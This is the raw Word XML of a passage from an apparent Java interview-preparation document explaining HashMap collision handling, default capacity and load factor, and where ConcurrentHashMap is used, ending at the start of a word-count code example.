    <w:p w14:paraId="11D315FC" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ndles collisions similarly (using linked lists or trees) but ensures that concurrent updates to different keys or even the same key don't result in inconsistent data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF2EF3" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ultiple threads can insert into different buckets concurrently without blocking each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB90846" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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3E7F6A21" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87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w:t>
      </w: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if you have two keys with the same hash code and different values, they will be stored in the same bucket and handled as separate entries in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>linked list</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Red-Black tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java 8+). If the same key is inserted again with a new value, the value will be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391741D7" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the same process occurs, but with additional thread-safety mechanisms to allow concurrent access to different segments/buckets without locking the entire map. This makes ConcurrentHashMap more suitable for multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14073567" w14:textId="1CA8DC25"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53C7D8A">
          <v:rect id="_x0000_i1584" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD2A3DC" w14:textId="77777777" w:rsidR="001D5028" w:rsidRPr="00CE4B95" w:rsidRDefault="001D5028">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="_Toc196307671"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default capacity of HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w14:paraId="0E15062F" w14:textId="46FAB62A" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="007C3403">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a HashMap in Java is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579AEA4D" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="007C3403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Additional Information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1B72C6" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Initial Capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When a HashMap is created without specifying an initial capacity, it starts with an initial capacity of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510EF7DC" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Load Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The default </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a HashMap is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>0.75</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The load factor determines when the map should be resized. If the number of entries exceeds 75% of the current capacity, the map will resize itself by doubling the number of buckets (rehashing the entries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46479C59" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="007C3403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4445CB9D" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="007C3403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashMap&lt;String, String&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A1123D" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="007C3403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>System.out.println("Initial Capacity: " + map.size()); // Will be 0 initially</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72457D95" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="007C3403">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">So, the default HashMap starts with 16 buckets and will resize when the number of entries exceeds </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which is 75% of 16).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A31503" w14:textId="09BB8CB5" w:rsidR="00324AE3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00324AE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="6D1640A9">
          <v:rect id="_x0000_i1585" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1154959B" w14:textId="77777777" w:rsidR="00ED664A" w:rsidRPr="00CE4B95" w:rsidRDefault="00ED664A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="_Toc196307672"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where will you use ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:p w14:paraId="79C390B0" w14:textId="4F5E0417" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">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should use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in situations where you need a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> map implementation with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It's particularly useful in multi-threaded environments, where multiple threads may read from and write to the map concurrently without causing inconsistencies or data corruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E92BA41" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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 are some practical scenarios where ConcurrentHashMap is preferred:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E003571" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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High Concurrency in Multi-threaded Environments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F041F" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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multiple threads need to perform operations like put(), get(), or remove() on the same map, ConcurrentHashMap ensures thread safety without locking the entire map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401DEB75" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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allows concurrent access to different segments of the map, thereby enabling multiple threads to operate on separate segments or buckets in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DECB4F" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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Shared Cache or Data Store:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2A6D71" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87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currentHashMap can be used to implement a shared cache where multiple threads need to access and update data concurrently. For example, storing results of expensive computations or frequently accessed data (like session data or user preferences).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B5566D" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87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Since ConcurrentHashMap provides safe concurrent reads and writes, it prevents the cache from being corrupted due to simultaneous modifications by different threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C16D49" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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Building Thread-Safe Data Structures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348A739E" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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you are implementing custom data structures that rely on maps and need to ensure thread safety, ConcurrentHashMap provides an easy way to manage concurrent access without needing to manage locks manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E825608" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Example: Implementing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread-safe counting map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (counting the number of occurrences of items in a concurrent environment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292B3E62" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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When You Need Fine-Grained Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B050865" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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oncurrentHashMap provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fine-grained locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Instead of locking the entire map, it locks individual segments (or buckets) while performing updates, allowing multiple threads to update different parts of the map concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1FFFE2" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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you're dealing with a high volume of concurrent read and write operations, this fine-grained locking will significantly improve performance compared to synchronizedMap or Hashtable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A837DF" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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Avoiding Blocking on Reads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01745DC0" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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nlike Hashtable or using synchronizedMap, where the entire map may be locked for every read/write operation, ConcurrentHashMap allows concurrent reads while updating different parts of the map. This leads to better scalability and performance when there are multiple threads that mostly read data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D4C44" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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instance, if you are implementing a real-time data processing application where threads need to fetch data from a map continuously while others update it, ConcurrentHashMap can help prevent performance bottlenecks caused by locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A3AB6B" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A8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Use Case: Counting Words in a Multi-threaded Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF3D73A" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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s an example of how ConcurrentHashMap can be used to count words in a text with multiple threads processing different parts of the text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44949E1E" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1482BAC5" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A81">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7643D12F" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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WordCountExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BCEC11" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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44B9028C" w14:textId="77777777" w:rsidR="00B43006" w:rsidRPr="00CE4B95" w:rsidRDefault="00B43006" w:rsidP="00034A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text = "hello world hello concurrent hashmap example";</w:t>
      </w:r>
    </w:p>
